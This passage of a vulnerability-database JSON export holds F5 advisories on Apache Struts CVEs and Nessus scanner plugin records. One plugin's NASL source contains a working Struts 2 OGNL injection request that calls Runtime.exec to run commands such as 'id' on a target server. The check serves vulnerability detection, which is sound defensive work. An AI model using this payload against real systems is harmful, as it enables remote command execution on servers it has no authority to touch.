10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nNone\n\n * [K9970: 
Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-26T02:09:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2016-0785, CVE-2016-2162, CVE-2016-3081, CVE-2016-3082, and CVE-2016-4003", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3082", "CVE-2016-0785", "CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3081"], "modified": "2017-03-13T23:05:00", "id": "F5:K17588029", "href": "https://support.f5.com/csp/article/K17588029", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:59", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: 
Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-25T00:00:00", "type": "f5", "title": "SOL17588029 - Apache Struts vulnerabilities CVE-2016-0785, CVE-2016-2162, CVE-2016-3081, CVE-2016-3082, and CVE-2016-4003", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3082", "CVE-2016-0785", "CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3081"], "modified": "2016-04-29T00:00:00", "id": "SOL17588029", "href": "http://support.f5.com/kb/en-us/solutions/public/k/17/sol17588029.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-22T12:31:57", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, 
and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not Vulnerable | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 
| Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-09T01:18:00", "type": "f5", "title": "Apache Struts Freemarker Remote Code Execution vulnerability CVE-2017-12611", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2017-11-16T00:00:00", "id": "F5:K45474286", "href": "https://support.f5.com/csp/article/K45474286", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2023-06-03T14:52:03", "description": "Apache Struts 2 
before 2.3.29 and 2.5.x before 2.5.1 allow attackers to have unspecified impact via vectors related to improper action name clean up. ([CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-03T16:14:00", "type": "f5", "title": "Apache Struts 2 vulnerability CVE-2016-4436", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4436"], "modified": "2017-08-03T16:14:00", "id": "F5:K93135205", "href": "https://support.f5.com/csp/article/K93135205", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-24T22:36:07", "description": "\nF5 Product Development has assigned ID 552890 to this vulnerability and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | 
Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 12.0.0 \n11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 12.0.0 \n11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 12.0.0 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nNone \n\n\n * [K9970: Subscribing to email notifications regarding F5 
products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2015-10-17T01:34:00", "type": "f5", "title": "Apache Struts 2 vulnerability CVE-2015-5169", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5169"], "modified": "2018-03-14T20:07:00", "id": "F5:K17449", "href": "https://support.f5.com/csp/article/K17449", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-16T04:23:25", "description": " \n\n\nApache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism. 
([CVE-2014-7809](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7809>)) \n\n\nImpact \n\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {}, "published": "2015-08-12T23:52:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2014-7809", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2016-01-08T23:11:00", "id": "F5:K17126", "href": "https://support.f5.com/csp/article/K17126", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:37:24", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by multiple cross-site scripting (XSS) vulnerabilities as well as session access and manipulation attacks; however, Nessus has not tested for these issues. 
\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {}, "published": "2013-06-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66935);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1965\", \"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60082, 60166, 60167);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. 
\n\nNote that this version of Struts 2 is reportedly also affected by\nmultiple cross-site scripting (XSS) vulnerabilities as well as session\naccess and manipulation attacks; however, Nessus has not tested for\nthese issues. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-014.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts Showcase < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/22\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp /.do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# 
Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"/${%23context['xwork.MethodAccessor.denyMethod\" +\n \"Execution']=!(%23_memberAccess['allowStaticMethodAccess']=true),\" +\n \"(@java.lang.Runtime@getRuntime()).exec('\" +cmd+ \"').waitFor()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/(0)?\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:34", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by multiple vulnerabilities : \n\n - A flaw exists within 'MultipartStream.java' in Apache Commons FileUpload when parsing malformed Content-Type headers. A remote attacker, using a crafted header, can exploit this to cause an infinite loop, resulting in a denial of service. 
(CVE-2014-0050)\n\n - Security bypass flaws exist in the ParametersInterceptor and CookieInterceptor classes, within the included Apache Struts 2 component, which are due to a failure to properly restrict access to their getClass() methods. A remote attacker, using a crafted request, can exploit these flaws to manipulate the ClassLoader, thus allowing the execution of arbitrary code or modification of the session state. Note that vulnerabilities CVE-2014-0112 and CVE-2014-0116 occurred because the patches for CVE-2014-0094 and CVE-2014-0113, respectively, were not complete fixes. (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116)", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor < 2.3.17 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts", "cpe:/a:apache:tomcat"], "id": "MYSQL_ENTERPRISE_MONITOR_2_3_17.NASL", "href": "https://www.tenable.com/plugins/nessus/83293", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83293);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2014-0050\",\n \"CVE-2014-0094\",\n \"CVE-2014-0112\",\n \"CVE-2014-0113\",\n \"CVE-2014-0116\"\n );\n script_bugtraq_id(\n 65400,\n 65999,\n 67064,\n 67081,\n 67218\n );\n script_xref(name:\"CERT\", value:\"719225\");\n script_xref(name:\"EDB-ID\", value:\"33142\");\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"MySQL Enterprise Monitor < 2.3.17 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by multiple vulnerabilities : \n\n - A flaw exists within 'MultipartStream.java' in Apache\n Commons FileUpload when parsing malformed Content-Type\n headers. A remote attacker, using a crafted header,\n can exploit this to cause an infinite loop, resulting\n in a denial of service. (CVE-2014-0050)\n\n - Security bypass flaws exist in the ParametersInterceptor\n and CookieInterceptor classes, within the included\n Apache Struts 2 component, which are due to a failure to\n properly restrict access to their getClass() methods. A\n remote attacker, using a crafted request, can exploit\n these flaws to manipulate the ClassLoader, thus allowing\n the execution of arbitrary code or modification of the\n session state. Note that vulnerabilities CVE-2014-0112\n and CVE-2014-0116 occurred because the patches for\n CVE-2014-0094 and CVE-2014-0113, respectively, were not\n complete fixes. 
(CVE-2014-0094, CVE-2014-0112,\n CVE-2014-0113, CVE-2014-0116)\");\n # https://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56618dc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-022\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 2.3.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
